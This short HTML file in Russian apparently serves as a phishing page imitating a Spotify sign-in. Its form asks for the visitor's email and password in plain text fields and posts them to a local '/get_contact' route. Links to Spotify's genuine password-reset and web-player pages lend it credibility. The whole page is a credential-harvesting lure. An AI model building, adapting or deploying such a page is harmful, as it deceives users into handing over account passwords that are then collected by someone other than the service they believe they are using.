<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Добро пожаловать</title>
</head>
<body>
    <center>
        <h1>Добро пожаловать</h1>
        <form method="POST" action="/get_contact">
            <h3>Ваша эл.почта: </h3>
            <input type="text" name="email"><br>
            <h3>Ваш пароль: </h3>
            <input type="text" name="password"><br>
            <p><a href="https://accounts.spotify.com/ru/password-reset?flow_ctx=00de44f0-d520-4449-9887-aaf7b94ac0e4%3A1693162519">Забыли пароль</a></p>
            <a href="https://open.spotify.com/">Продолжить</a>
        </form>
    </center>
</body>
</html>